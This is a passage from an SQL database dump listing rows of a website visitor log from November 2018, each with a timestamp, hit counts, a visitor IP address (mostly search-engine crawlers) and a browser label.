,0,'66.249.64.30','chrome'),(338187,1542852385,3,3,0,0,'66.249.64.15','chrome'),(338188,1542852513,1,1,0,0,'66.249.64.28','chrome'),(338189,1542852544,1,1,0,0,'66.249.64.29','chrome'),(338190,1542852545,2,2,0,0,'66.249.64.16','chrome'),(338191,1542852645,1,1,0,0,'92.253.251.181','chrome'),(338192,1542852659,1,1,0,0,'54.36.149.66','other'),(338193,1542852661,1,1,0,0,'46.229.168.150','other'),(338194,1542853281,1,1,0,0,'54.36.148.23','other'),(338195,1542853874,2,2,0,0,'8.29.198.27','other'),(338196,1542854141,2,2,0,0,'178.171.54.21','chrome'),(338197,1542854792,2,2,0,0,'34.219.202.234','chrome'),(338198,1542855400,2,2,0,0,'95.163.255.92','other'),(338199,1542856392,1,1,0,0,'66.249.64.14','chrome'),(338200,1542857356,4,4,0,0,'178.154.244.11','other'),(338201,1542857494,2,2,0,0,'5.45.207.79','other'),(338202,1542857530,7,7,0,0,'178.154.244.29','other'),(338203,1542857668,1,1,0,0,'46.229.168.141','other'),(338204,1542857670,1,1,0,0,'46.229.168.135','other'),(338205,1542858069,1,1,0,0,'141.8.142.108','other'),(338206,1542858353,3,3,0,0,'178.154.244.11','other'),(338207,1542858415,1,1,0,0,'66.249.64.14','chrome'),(338208,1542858481,1,1,0,0,'216.244.65.12','chrome'),(338209,1542858762,5,5,0,0,'178.154.244.29','other'),(338210,1542858871,4,4,0,0,'5.45.207.79','other'),(338211,1542859238,2,2,0,0,'66.249.70.27','chrome'),(338212,1542859240,1,1,0,0,'66.249.70.10','chrome'),(338213,1542859397,6,6,0,0,'178.154.244.11','other'),(338214,1542859488,1,1,0,0,'77.123.122.176','chrome'),(338215,1542859502,1,1,0,0,'66.249.64.30','chrome'),(338217,1542859677,1,1,0,0,'66.249.70.12','chrome'),(338218,1542859692,1,1,0,0,'66.249.64.28','chrome'),(338219,1542859693,1,1,0,0,'66.249.64.16','chrome'),(338220,1542859831,1,1,0,0,'95.163.255.94','other'),(338221,1542859846,1,1,0,0,'95.163.255.97','other'),(338222,1542860050,1,1,0,0,'66.249.64.15','chrome'),(338223,1542861742,4,4,0,0,'178.154.244.29','other'),(338224,1542861752,1,1,0,0,'5.45.207.79','other'),(338225,1542862078,1,1,0,0,'95.163.255.187','other'),(338226,1542862081,1,1,0,0,'95.163.255.177','other'),(338227,1542863094,1,1,0,0,'8.29.198.26','other'),(338228,1542864463,2,2,0,0,'66.249.64.28','chrome'),(338229,1542864464,1,1,0,0,'66.249.64.16','chrome'),(338230,1542864710,2,2,0,0,'8.29.198.25','other'),(338231,1542864731,2,0,2,0,'66.249.64.14',''),(338232,1542864884,2,2,0,0,'66.249.70.25','chrome'),(338233,1542864885,2,2,0,0,'66.249.70.12','chrome'),(338234,1542865043,1,1,0,0,'66.249.64.15','chrome'),(338235,1542865621,1,1,0,0,'178.154.244.29','other'),(338236,1542866940,1,1,0,0,'66.249.70.27','chrome'),(338237,1542866941,1,1,0,0,'66.249.70.8','chrome'),(338238,1542866948,1,1,0,0,'66.249.64.16','chrome'),(338239,1542867193,1,1,0,0,'92.253.251.181','chrome'),(338240,1542867414,2,2,0,0,'91.196.178.134','firefox'),(338241,1542868135,1,1,0,0,'40.77.167.162','other'),(338242,1542868579,1,1,0,0,'46.229.168.148','other'),(338243,1542868581,1,1,0,0,'46.229.168.144','other'),(338244,1542868626,2,2,0,0,'178.154.244.29','other'),(338245,1542868863,2,2,0,0,'217.69.143.217','firefox'),(338246,1542868994,1,1,0,0,'157.55.39.252','other'),(338247,1542869236,1,0,1,0,'66.249.64.15',''),(338248,1542869535,2,2,0,0,'91.195.156.90','chrome'),(338249,1542869539,1,0,1,0,'66.249.64.14',''),(338250,1542869854,2,2,0,0,'91.196.178.134','firefox'),(338251,1542870154,1,1,0,0,'66.249.64.14','chrome'),(338252,1542870948,1,1,0,0,'95.163.255.93','other'),(338253,1542870951,1,1,0,0,'95.163.255.95','other'),(338254,1542871060,1,1,0,0,'66.249.64.15','chrome'),(338255,1542871682,2,2,0,0,'178.92.156.218','firefox'),(338256,1542871870,1,1,0,0,'66.249.70.25','chrome'),(338258,1542871873,1,1,0,0,'82.207.91.234','other'),(338259,1542871895,1,1,0,0,'93.78.185.9','chrome'),(338260,1542871919,1,1,0,0,'46.229.168.143','other'),(338261,1542872321,2,2,0,0,'95.132.55.99','firefox'),(338262,1542872458,1,1,0,0,'151.80.98.23','other'),(338263,1542872545,1,1,0,0,'66.249.64.16','chrome'),(338264,1542872556,1,1,0,0,'91.196.178.81','chrome'),(338265,1542872914,1,1,0,0,'95.163.255.160','other'),(338266,1542872916,1,1,0,0,'95.163.255.197','other'),(338267,1542873338,1,1,0,0,'46.229.168.138','other'),(338268,1542873442,1,1,0,0,'37.53.89.22','chrome'),(338269,1542873652,3,3,0,0,'91.196.178.169','chrome'),(338270,1542873663,1,1,0,0,'40.77.167.104','other'),(338271,1542873927,1,1,0,0,'8.29.198.25','other'),(338272,1542874006,2,2,0,0,'54.36.149.45','other'),(338273,1542874376,1,1,0,0,'46.229.168.149','other'),(338274,1542874378,1,1,0,0,'46.229.168.143','other'),(338275,1542874408,1,1,0,0,'91.196.178.81','chrome'),(338276,1542874465,1,1,0,0,'54.36.149.71','other'),(338277,1542874524,6,6,0,0,'157.55.39.252','other'),(338278,1542874733,1,1,0,0,'54.36.148.48','other'),(338279,1542874736,1,1,0,0,'54.36.148.70','other'),(338280,1542874890,1,1,0,0,'54.36.148.44','other'),(338281,1542874896,1,1,0,0,'54.36.149.67','other'),(338282,1542874912,1,1,0,0,'54.36.149.105','other'),(338283,1542875070,5,5,0,0,'40.77.167.85','other'),(338284,1542875171,1,1,0,0,'54.36.148.251','other'),(338285,1542875188,1,1,0,0,'95.163.255.150','other'),(338286,1542875213,6,6,0,0,'40.77.167.104','other'),(338287,1542875218,9,9,0,0,'40.77.167.162','other'),(338288,1542875223,1,1,0,0,'95.163.255.190','other'),(338289,1542875350,1,1,0,0,'54.36.149.66','other'),(338290,1542875412,1,1,0,0,'54.36.149.20','other'),(338291,1542875437,1,1,0,0,'54.36.148.128','other'),(338292,1542875547,2,2,0,0,'8.29.198.27','other'),(338293,1542875776,1,1,0,0,'66.249.64.14','chrome'),(338294,1542875984,1,1,0,0,'54.36.149.56','other'),(338295,1542876061,1,1,0,0,'54.36.148.144','other'),(338296,1542876530,1,1,0,0,'40.77.167.162','other'),(338297,1542876562,2,2,0,0,'91.196.177.46','firefox'),(338298,1542876647,1,1,0,0,'54.36.149.105','other'),(338299,1542876807,1,1,0,0,'54.36.148.11','other'),(338300,1542876861,1,1,0,0,'66.249.64.16','chrome'),(338301,1542877000,1,1,0,0,'40.77.167.85','other'),(338302,1542877116,1,1,0,0,'54.36.148.107','other'),(338303,1542877159,1,1,0,0,'87.250.224.47','other'),(338304,1542877413,1,1,0,0,'54.36.149.94','other'),(338305,1542877450,4,4,0,0,'178.154.244.29','other'),(338306,1542877493,1,1,0,0,'54.36.148.74','other'),(338307,1542877530,4,4,0,0,'178.154.244.11','other'),(338308,1542877603,4,4,0,0,'5.45.207.79','other'),(338309,1542877678,1,1,0,0,'213.109.226.24','other'),(338310,1542877757,2,2,0,0,'157.55.39.252','other'),(338311,1542877765,2,2,0,0,'130.180.216.30','chrome'),(338312,1542877848,1,1,0,0,'54.36.148.55','other'),(338313,1542877857,1,1,0,0,'54.36.148.19','other'),(338314,1542877946,1,1,0,0,'91.196.178.97','chrome'),(338315,1542878153,1,1,0,0,'54.36.148.17','other'),(338316,1542878190,4,4,0,0,'5.45.207.19','other'),(338317,1542878191,2,2,0,0,'141.8.142.103','other'),(338318,1542878292,1,1,0,0,'91.196.177.46','firefox'),(338319,1542878323,1,1,0,0,'54.36.149.65','other'),(338320,1542878399,7,7,0,0,'178.154.244.29','other'),(338321,1542878400,1,1,0,0,'37.9.113.148','other'),(338322,1542878402,1,1,0,0,'54.36.148.246','other'),(338323,1542878500,4,4,0,0,'178.154.244.11','other'),(338324,1542878634,1,1,0,0,'54.36.148.74','other'),(338325,1542878673,1,1,0,0,'66.249.70.10','chrome'),(338326,1542878752,1,1,0,0,'66.249.64.29','chrome'),(338327,1542878753,1,1,0,0,'66.249.64.16','chrome'),(338328,1542878805,1,1,0,0,'54.36.148.181','other'),(338329,1542878879,1,1,0,0,'54.36.148.37','other'),(338330,1542878969,2,2,0,0,'62.205.134.182','chrome'),(338331,1542879007,1,1,0,0,'54.36.148.231','other'),(338332,1542879008,4,4,0,0,'5.45.207.79','other'),(338333,1542879014,1,1,0,0,'66.249.64.15','chrome'),(338334,1542879199,1,1,0,0,'91.196.177.46','firefox'),(338335,1542879452,1,1,0,0,'54.36.148.177','other'),(338336,1542879476,1,1,0,0,'37.9.113.148','other'),(338337,1542879513,1,1,0,0,'54.36.148.39','other'),(338338,1542879631,2,2,0,0,'178.154.244.11','other'),(338339,1542879648,2,2,0,0,'178.154.244.29','other'),(338340,1542879784,1,1,0,0,'95.163.255.99','other'),(338341,1542879824,3,3,0,0,'66.249.64.16','chrome'),(338342,1542879851,1,1,0,0,'54.36.148.66','other'),(338343,1542879859,1,1,0,0,'54.36.148.120','other'),(338344,1542880117,1,1,0,0,'91.196.177.46','firefox'),(338345,1542880536,1,1,0,0,'54.36.148.36','other'),(338346,1542880581,1,1,0,0,'157.55.39.252','other'),(338347,1542880622,1,1,0,0,'66.249.70.8','chrome'),(338348,1542880630,1,1,0,0,'66.249.64.29','chrome'),(338349,1542880655,1,1,0,0,'54.36.149.72','other'),(338350,1542880845,1,1,0,0,'54.36.148.77','other'),(338351,1542880853,1,1,0,0,'54.36.148.40','other'),(338352,1542880860,2,2,0,0,'178.154.244.29','other'),(338353,1542880870,2,2,0,0,'54.36.148.33','other'),(338354,1542880988,1,1,0,0,'31.43.8.106','chrome'),(338355,1542881059,1,1,0,0,'54.36.148.249','other'),(338356,1542881110,1,1,0,0,'54.36.149.7','other'),(338357,1542881192,1,1,0,0,'54.36.149.81','other'),(338358,1542881287,1,0,1,0,'93.78.185.9',''),(338359,1542881372,2,2,0,0,'46.219.205.179','chrome'),(338360,1542881382,2,2,0,0,'37.54.19.240','chrome'),(338361,1542881434,1,1,0,0,'54.36.148.39','other'),(338362,1542881438,1,1,0,0,'54.36.148.204','other'),(338363,1542881486,1,1,0,0,'54.36.148.129','other'),(338364,1542881500,1,1,0,0,'54.36.149.40','other'),(338365,1542881570,1,1,0,0,'54.36.148.229','other'),(338366,1542881616,1,1,0,0,'54.36.148.86','other'),(338367,1542881683,1,1,0,0,'54.36.149.34','other'),(338368,1542881774,1,1,0,0,'95.163.255.64','other'),(338369,1542881776,1,1,0,0,'95.163.255.68','other'),(338370,1542881837,1,1,0,0,'46.229.168.151','other'),(338371,1542881888,1,1,0,0,'194.44.239.131','chrome'),(338372,1542881965,1,1,0,0,'54.36.149.96','other'),(338373,1542882400,1,1,0,0,'54.36.148.159','other'),(338374,1542882501,1,1,0,0,'54.36.148.76','other'),(338375,1542882617,1,1,0,0,'66.249.64.16','chrome'),(338376,1542882684,1,1,0,0,'54.36.149.16','other'),(338377,1542882722,1,1,0,0,'54.36.148.153','other'),(338378,1542882730,1,1,0,0,'54.36.148.186','other'),(338379,1542882776,1,1,0,0,'54.36.148.15','other'),(338380,1542882787,1,0,1,0,'93.78.185.9',''),(338381,1542882856,1,1,0,0,'66.249.64.15','chrome'),(338382,1542882984,1,1,0,0,'40.77.167.162','other'),(338383,1542883102,1,1,0,0,'66.249.64.14','chrome'),(338384,1542883211,1,1,0,0,'54.36.148.113','other'),(338385,1542883212,2,2,0,0,'5.45.207.19','other'),(338386,1542883215,2,2,0,0,'5.45.207.79','other'),(338387,1542883310,1,1,0,0,'95.163.255.186','other'),(338388,1542883313,1,1,0,0,'95.163.255.195','other'),(338389,1542883383,1,1,0,0,'178.154.244.29','other'),(338390,1542883509,1,1,0,0,'91.196.178.81','chrome'),(338391,1542883555,2,2,0,0,'91.196.177.46','firefox'),(338392,1542883630,1,1,0,0,'213.109.226.24','other'),(338393,1542883928,2,2,0,0,'95.163.255.99','other'),(338394,1542883931,1,1,0,0,'66.249.64.15','chrome'),(338395,1542883976,1,1,0,0,'95.163.255.187','other'),(338396,1542883979,1,1,0,0,'95.163.255.178','other'),(338397,1542884070,1,1,0,0,'54.36.148.101','other'),(338398,1542884150,1,1,0,0,'54.36.149.71','other'),(338399,1542884520,1,1,0,0,'54.36.148.187','other'),(338400,1542884643,1,1,0,0,'178.154.244.11','other'),(338401,1542884758,1,1,0,0,'8.29.198.25','other'),(338402,1542884796,1,1,0,0,'46.229.168.141','other'),(338403,1542884816,1,1,0,0,'54.36.148.155','other'),(338404,1542885243,1,1,0,0,'54.36.148.230','other'),(338405,1542885348,1,1,0,0,'54.36.148.160','other'),(338406,1542885474,2,2,0,0,'54.36.148.49','other'),(338407,1542885831,1,1,0,0,'54.36.148.174','other'),(338408,1542885865,2,2,0,0,'54.36.148.248','other'),(338409,1542885870,1,1,0,0,'54.36.148.163','other'),(338410,1542886324,1,1,0,0,'54.36.148.166','other'),(338411,1542886359,1,1,0,0,'54.36.148.200','other'),(338412,1542886369,1,1,0,0,'54.36.149.43','other'),(338413,1542886378,1,1,0,0,'8.29.198.26','other'),(338414,1542886414,1,1,0,0,'54.36.148.17','other'),(338415,1542886439,1,1,0,0,'54.36.148.239','other'),(338416,1542886448,1,1,0,0,'54.36.148.159','other'),(338417,1542886487,1,1,0,0,'54.36.148.98','other'),(338418,1542886583,1,1,0,0,'54.36.148.27','other'),(338419,1542887050,1,1,0,0,'54.36.148.137','other'),(338420,1542887063,1,1,0,0,'8.29.198.27','other'),(338421,1542887211,1,1,0,0,'54.36.148.31','other'),(338422,1542887286,1,1,0,0,'66.249.64.29','chrome'),(338424,1542887386,1,1,0,0,'54.36.148.143','other'),(338425,1542887548,1,1,0,0,'66.249.64.30','chrome'),(338426,1542887549,1,1,0,0,'66.249.64.14','chrome'),(338427,1542887833,1,1,0,0,'54.36.148.225','other'),(338428,1542887858,1,1,0,0,'54.36.148.77','other'),(338429,1542887916,1,1,0,0,'46.211.133.80','chrome'),(338430,1542888040,1,1,0,0,'66.249.64.15','chrome'),(338431,1542888052,1,1,0,0,'54.36.148.86','other'),(338432,1542888068,1,1,0,0,'5.45.207.19','other'),(338433,1542888071,1,1,0,0,'5.45.207.79','other'),(338434,1542888202,1,1,0,0,'54.36.148.140','other'),(338435,1542888271,1,1,0,0,'54.36.148.25','other'),(338436,1542888462,2,2,0,0,'40.77.167.162','other'),(338437,1542888585,1,1,0,0,'54.36.148.122','other'),(338438,1542888592,1,1,0,0,'54.36.148.173','other'),(338439,1542888706,1,1,0,0,'54.36.148.142','other'),(338440,1542888775,1,1,0,0,'54.36.148.79','other'),(338441,1542888901,1,1,0,0,'54.36.148.217','other'),(338442,1542888905,1,1,0,0,'54.36.148.12','other'),(338443,1542888923,1,1,0,0,'54.36.148.14','other'),(338444,1542888984,1,1,0,0,'54.36.148.45','other'),(338445,1542889052,1,1,0,0,'178.154.244.29','other'),(338446,1542889065,1,1,0,0,'54.36.149.24','other'),(338447,1542889206,1,1,0,0,'54.36.148.248','other'),(338448,1542889348,1,1,0,0,'54.36.148.191','other'),(338449,1542889575,1,1,0,0,'54.36.149.88','other'),(338450,1542889619,1,1,0,0,'54.36.149.26','other'),(338451,1542889657,1,1,0,0,'54.36.148.68','other'),(338452,1542889776,1,1,0,0,'157.55.39.252','other'),(338453,1542889906,2,2,0,0,'66.249.64.15','chrome'),(338454,1542889963,1,1,0,0,'54.36.149.104','other'),(338455,1542890059,1,1,0,0,'54.36.148.84','other'),(338456,1542890301,1,1,0,0,'54.36.148.182','other'),(338457,1542890644,1,1,0,0,'54.36.148.132','other'),(338458,1542890729,1,1,0,0,'54.36.148.177','other'),(338459,1542890842,1,1,0,0,'54.36.148.212','other'),(338460,1542891007,1,1,0,0,'54.36.148.158','other'),(338461,1542891021,1,1,0,0,'54.36.148.108','other'),(338462,1542891024,1,1,0,0,'91.196.178.81','chrome'),(338463,1542891068,1,1,0,0,'54.36.148.170','other'),(338464,1542891073,2,2,0,0,'66.249.64.28','chrome'),(338466,1542891409,2,2,0,0,'66.249.64.15','chrome'),(338467,1542891484,1,1,0,0,'54.36.148.166','other'),(338468,1542891494,2,2,0,0,'66.249.64.14','chrome'),(338469,1542891667,1,1,0,0,'54.36.148.23','other'),(338470,1542891743,1,1,0,0,'54.36.149.52','other'),(338471,1542891749,1,1,0,0,'54.36.148.52','other'),(338472,1542891908,1,1,0,0,'195.66.157.122','chrome'),(338473,1542891923,1,1,0,0,'54.36.148.37','other'),(338474,1542891930,1,1,0,0,'54.36.148.20','other'),(338475,1542891969,1,1,0,0,'95.163.255.102','other'),(338476,1542891976,1,1,0,0,'95.163.255.103','other'),(338477,1542891977,1,1,0,0,'54.36.148.56','other'),(338478,1542892096,1,1,0,0,'66.249.64.16','chrome'),(338479,1542892124,1,1,0,0,'54.36.148.75','other'),(338480,1542892311,1,1,0,0,'54.36.148.142','other'),(338481,1542892405,2,2,0,0,'91.196.178.81','chrome'),(338482,1542892411,1,1,0,0,'54.36.149.33','other'),(338483,1542892486,1,1,0,0,'54.36.148.249','other'),(338484,1542892595,1,1,0,0,'40.77.167.85','other'),(338485,1542892821,1,1,0,0,'54.36.148.58','other'),(338486,1542892835,2,2,0,0,'130.180.216.30','chrome'),(338487,1542893309,1,1,0,0,'95.163.255.185','other'),(338488,1542893312,1,1,0,0,'95.163.255.196','other'),(338490,1542893483,1,1,0,0,'46.229.168.138','other'),(338491,1542893538,1,1,0,0,'54.36.148.246','other'),(338492,1542893580,1,1,0,0,'54.36.148.159','other'),(338493,1542893607,1,1,0,0,'54.36.148.83','other'),(338494,1542893660,1,1,0,0,'66.249.70.10','chrome'),(338495,1542893663,1,1,0,0,'46.229.168.129','other'),(338496,1542893677,3,3,0,0,'91.196.179.134','chrome'),(338497,1542893679,1,1,0,0,'54.36.148.160','other'),(338498,1542893717,1,1,0,0,'54.36.148.175','other'),(338499,1542893797,2,2,0,0,'91.196.178.81','chrome'),(338500,1542893895,1,1,0,0,'54.36.148.243','other'),(338501,1542893979,1,1,0,0,'54.36.148.16','other'),(338502,1542894154,1,1,0,0,'54.36.149.6','other'),(338503,1542894172,1,1,0,0,'54.36.149.86','other'),(338504,1542894287,1,1,0,0,'220.243.136.21','chrome'),(338505,1542894331,1,1,0,0,'54.36.149.37','other'),(338506,1542894387,1,1,0,0,'46.201.125.163','chrome'),(338507,1542894422,1,1,0,0,'95.163.255.93','other'),(338508,1542894426,1,1,0,0,'95.163.255.94','other'),(338509,1542894531,1,1,0,0,'157.55.39.252','other'),(338510,1542894823,1,1,0,0,'54.36.148.77','other'),(338511,1542894901,1,1,0,0,'95.163.255.164','other'),(338512,1542894902,1,1,0,0,'95.163.255.156','other'),(338513,1542895192,1,1,0,0,'66.249.64.14','chrome'),(338514,1542895485,1,1,0,0,'54.36.149.17','other'),(338515,1542895571,1,1,0,0,'54.36.149.53','other'),(338516,1542895597,1,1,0,0,'8.29.198.25','other'),(338517,1542895609,1,1,0,0,'46.229.168.135','other'),(338518,1542895612,2,2,0,0,'46.229.168.137','other'),(338519,1542895681,1,1,0,0,'54.36.148.150','other'),(338520,1542895688,3,3,0,0,'54.165.59.7','other'),(338521,1542895761,3,3,0,0,'91.196.178.66','firefox'),(338522,1542895779,1,1,0,0,'66.249.70.25','chrome'),(338523,1542895780,1,1,0,0,'66.249.70.8','chrome'),(338524,1542895954,1,1,0,0,'54.36.148.182','other'),(338525,1542896160,1,1,0,0,'54.36.148.114','other'),(338526,1542896210,1,1,0,0,'54.36.148.125','other'),(338527,1542896463,1,1,0,0,'66.249.66.155','chrome'),(338528,1542896465,2,2,0,0,'66.249.66.156','chrome'),(338529,1542896487,1,1,0,0,'77.111.247.180','chrome'),(338530,1542896586,2,2,0,0,'5.45.207.79','other'),(338531,1542896609,1,1,0,0,'54.36.149.0','other'),(338532,1542896808,2,2,0,0,'37.203.16.119','chrome'),(338533,1542897042,7,7,0,0,'178.154.244.29','other'),(338534,1542897065,1,1,0,0,'157.55.39.252','other'),(338535,1542897213,2,2,0,0,'8.29.198.26','other'),(338536,1542897384,1,1,0,0,'40.77.167.162','other'),(338537,1542897402,1,1,0,0,'54.36.148.150','other'),(338538,1542897414,1,1,0,0,'54.36.149.68','other'),(338539,1542897451,3,3,0,0,'178.154.244.11','other'),(338540,1542897632,1,1,0,0,'46.229.168.149','other'),(338541,1542897637,1,1,0,0,'54.36.148.190','other'),(338542,1542897720,1,1,0,0,'54.36.148.231','other'),(338543,1542897871,1,1,0,0,'54.36.148.217','other'),(338544,1542897902,1,1,0,0,'54.36.148.159','other'),(338545,1542898009,5,5,0,0,'178.154.244.29','other'),(338546,1542898039,1,1,0,0,'54.36.148.211','other'),(338547,1542898074,1,1,0,0,'54.36.148.226','other'),(338548,1542898117,2,2,0,0,'5.45.207.19','other'),(338549,1542898120,1,1,0,0,'54.36.148.129','other'),(338550,1542898403,1,1,0,0,'54.36.148.186','other'),(338551,1542898438,1,1,0,0,'66.249.66.154','chrome'),(338552,1542898483,2,2,0,0,'80.254.155.43','chrome'),(338553,1542898510,1,1,0,0,'54.36.149.73','other'),(338554,1542898532,1,1,0,0,'46.229.168.137','other'),(338555,1542898533,1,1,0,0,'46.229.168.154','other'),(338556,1542898550,1,1,0,0,'54.36.148.154','other'),(338557,1542898607,1,1,0,0,'54.36.148.85','other'),(338559,1542898612,3,3,0,0,'91.196.178.81','chrome'),(338560,1542898842,1,1,0,0,'178.154.244.11','other'),(338561,1542898920,1,1,0,0,'178.92.156.243','chrome'),(338562,1542898935,1,1,0,0,'95.135.22.142','chrome'),(338563,1542898950,2,2,0,0,'178.154.244.29','other'),(338564,1542898981,1,1,0,0,'54.36.148.117','other'),(338565,1542898988,2,2,0,0,'95.132.11.190','firefox'),(338566,1542899245,1,1,0,0,'54.36.148.201','other'),(338567,1542899316,1,1,0,0,'54.36.149.52','other'),(338568,1542899431,1,1,0,0,'54.36.148.73','other'),(338569,1542899527,1,1,0,0,'54.36.149.72','other'),(338570,1542899528,1,1,0,0,'66.249.66.156','chrome'),(338571,1542899622,1,1,0,0,'40.77.167.162','other'),(338572,1542899629,1,1,0,0,'54.36.148.43','other'),(338573,1542899652,1,1,0,0,'54.36.148.209','other'),(338574,1542899809,1,1,0,0,'54.36.148.49','other'),(338575,1542900037,1,1,0,0,'54.36.148.15','other'),(338576,1542900142,1,1,0,0,'157.55.39.252','other'),(338577,1542900201,1,1,0,0,'54.36.148.116','other'),(338578,1542900217,1,1,0,0,'54.36.148.13','other'),(338579,1542900390,1,1,0,0,'54.36.148.90','other'),(338580,1542900436,1,1,0,0,'54.36.149.107','other'),(338581,1542900471,1,1,0,0,'178.154.244.29','other'),(338582,1542900476,1,1,0,0,'54.36.149.32','other'),(338583,1542900518,1,1,0,0,'40.77.167.104','other'),(338584,1542900658,1,1,0,0,'54.36.148.217','other'),(338585,1542900814,1,1,0,0,'54.36.148.226','other'),(338586,1542900993,1,1,0,0,'66.249.66.152','chrome'),(338587,1542901099,1,1,0,0,'54.36.148.96','other'),(338588,1542901138,1,1,0,0,'157.55.39.252','other'),(338589,1542901176,1,1,0,0,'95.163.255.189','other'),(338590,1542901179,1,1,0,0,'95.163.255.160','other'),(338591,1542901217,1,1,0,0,'54.36.148.154','other'),(338592,1542901233,1,1,0,0,'54.36.148.48','other'),(338593,1542901241,1,1,0,0,'46.229.168.137','other'),(338594,1542901244,1,1,0,0,'95.163.255.155','other'),(338595,1542901246,1,1,0,0,'95.163.255.196','other'),(338596,1542901769,1,1,0,0,'54.36.148.251','other'),(338597,1542901774,1,1,0,0,'54.36.148.121','other'),(338598,1542901782,1,1,0,0,'54.36.148.232','other'),(338599,1542901938,1,1,0,0,'54.36.148.142','other'),(338600,1542901986,1,1,0,0,'54.36.148.46','other'),(338601,1542902146,1,1,0,0,'54.36.148.20','other'),(338602,1542902472,1,1,0,0,'54.36.149.29','other'),(338603,1542902591,1,1,0,0,'66.249.66.152','chrome'),(338604,1542902685,1,1,0,0,'54.36.148.120','other'),(338605,1542902829,2,2,0,0,'66.249.66.154','chrome'),(338606,1542902843,1,1,0,0,'46.229.168.148','other'),(338607,1542902845,1,1,0,0,'46.229.168.146','other'),(338608,1542902847,1,1,0,0,'54.36.149.81','other'),(338609,1542902872,1,1,0,0,'54.36.148.136','other'),(338611,1542902900,2,2,0,0,'66.249.66.40','chrome'),(338612,1542902908,1,1,0,0,'66.249.66.42','chrome'),(338613,1542902949,1,1,0,0,'54.36.149.63','other'),(338614,1542903336,2,2,0,0,'46.229.168.139','other'),(338615,1542903339,1,1,0,0,'46.229.168.132','other'),(338616,1542903369,1,1,0,0,'66.249.66.155','chrome'),(338617,1542903377,1,1,0,0,'54.36.148.128','other'),(338618,1542903501,1,1,0,0,'54.36.148.66','other'),(338619,1542903567,1,1,0,0,'54.36.148.124','other'),(338620,1542903828,2,2,0,0,'54.36.148.183','other'),(338621,1542903857,1,1,0,0,'54.36.149.0','other'),(338622,1542903970,1,1,0,0,'46.229.168.151','other'),(338623,1542904131,1,1,0,0,'66.249.66.59','chrome'),(338624,1542904132,1,1,0,0,'66.249.66.42','chrome'),(338625,1542904405,1,1,0,0,'54.36.148.148','other'),(338626,1542904422,1,1,0,0,'95.163.255.112','other'),(338627,1542904430,1,1,0,0,'95.163.255.114','other'),(338628,1542904518,1,1,0,0,'54.36.149.25','other'),(338629,1542904519,1,1,0,0,'54.36.149.44','other'),(338630,1542904589,1,1,0,0,'54.36.148.49','other'),(338631,1542904917,1,1,0,0,'54.36.148.162','other'),(338632,1542904957,1,1,0,0,'54.36.149.49','other'),(338633,1542905006,1,1,0,0,'54.36.148.190','other'),(338634,1542905060,2,2,0,0,'66.249.66.42','chrome'),(338635,1542905069,1,1,0,0,'54.36.148.164','other'),(338636,1542905155,1,1,0,0,'54.36.148.217','other'),(338637,1542905161,1,1,0,0,'40.77.167.162','other'),(338638,1542905226,1,1,0,0,'54.36.149.64','other'),(338639,1542905282,1,1,0,0,'54.36.148.252','other'),(338640,1542905596,2,2,0,0,'207.46.13.236','other'),(338641,1542905634,1,1,0,0,'54.36.148.222','other'),(338642,1542905885,1,1,0,0,'54.36.148.236','other'),(338643,1542905916,1,1,0,0,'54.36.148.110','other'),(338644,1542906055,1,1,0,0,'54.36.148.43','other'),(338645,1542906093,1,1,0,0,'54.36.149.6','other'),(338646,1542906205,1,1,0,0,'54.36.149.61','other'),(338647,1542906338,1,1,0,0,'66.249.66.154','chrome'),(338648,1542906363,1,1,0,0,'54.36.148.208','other'),(338649,1542906429,1,1,0,0,'46.229.168.138','other'),(338650,1542906444,1,1,0,0,'8.29.198.27','other'),(338651,1542906494,1,1,0,0,'46.229.168.145','other'),(338652,1542906502,2,2,0,0,'54.36.148.242','other'),(338653,1542906610,1,1,0,0,'54.36.148.106','other'),(338654,1542906654,1,1,0,0,'54.36.148.55','other'),(338655,1542906656,1,1,0,0,'66.249.66.40','chrome'),(338656,1542906663,3,3,0,0,'66.249.66.42','chrome'),(338657,1542906760,1,1,0,0,'54.36.149.52','other'),(338658,1542906790,2,2,0,0,'66.249.66.44','chrome'),(338659,1542906855,2,2,0,0,'46.211.133.70','chrome'),(338660,1542906937,1,1,0,0,'46.229.168.143','other'),(338661,1542907002,1,1,0,0,'54.36.148.64','other'),(338662,1542907030,1,1,0,0,'54.36.148.193','other'),(338663,1542907563,1,1,0,0,'54.36.148.149','other'),(338664,1542907773,2,2,0,0,'54.36.148.198','other'),(338665,1542907889,1,1,0,0,'54.36.149.62','other'),(338666,1542908017,1,1,0,0,'54.36.149.4','other'),(338667,1542908024,1,1,0,0,'54.36.148.140','other'),(338668,1542908041,1,1,0,0,'8.29.198.27','other'),(338669,1542908098,1,1,0,0,'54.36.148.114','other'),(338670,1542908356,1,1,0,0,'54.36.149.46','other'),(338671,1542908457,2,2,0,0,'66.249.66.42','chrome'),(338672,1542908589,1,1,0,0,'157.55.39.252','other'),(338673,1542908627,1,1,0,0,'178.154.244.11','other'),(338674,1542908695,1,1,0,0,'54.36.148.120','other'),(338675,1542908755,1,1,0,0,'8.29.198.26','other'),(338676,1542908813,1,1,0,0,'54.36.149.73','other'),(338677,1542908815,1,1,0,0,'54.36.149.14','other'),(338678,1542908838,1,1,0,0,'54.36.149.20','other'),(338679,1542908886,1,1,0,0,'54.36.149.40','other'),(338680,1542909038,1,1,0,0,'54.36.148.233','other'),(338681,1542909226,1,1,0,0,'54.36.148.10','other'),(338682,1542909346,1,1,0,0,'66.249.66.154','chrome'),(338683,1542909420,1,1,0,0,'54.36.149.9','other'),(338684,1542909467,1,1,0,0,'54.36.148.46','other'),(338685,1542909478,1,1,0,0,'54.36.148.32','other'),(338686,1542909488,1,1,0,0,'54.36.148.209','other'),(338687,1542909594,1,1,0,0,'54.36.149.93','other'),(338688,1542909674,1,1,0,0,'54.36.149.42','other'),(338689,1542909862,3,3,0,0,'66.249.66.157','chrome'),(338690,1542909863,2,2,0,0,'66.249.66.152','chrome'),(338691,1542909879,1,1,0,0,'54.36.149.31','other'),(338692,1542909901,1,1,0,0,'54.36.148.131','other'),(338693,1542909933,2,2,0,0,'66.249.66.42','chrome'),(338694,1542910022,1,1,0,0,'54.36.148.107','other'),(338695,1542910047,1,1,0,0,'178.154.244.11','other'),(338696,1542910089,1,1,0,0,'54.36.149.68','other'),(338697,1542910323,1,1,0,0,'54.36.149.100','other'),(338698,1542910355,2,2,0,0,'66.249.66.154','chrome'),(338699,1542910378,1,1,0,0,'66.249.66.155','chrome'),(338700,1542910392,1,1,0,0,'54.36.148.152','other'),(338701,1542910684,1,1,0,0,'54.36.148.128','other'),(338702,1542911029,1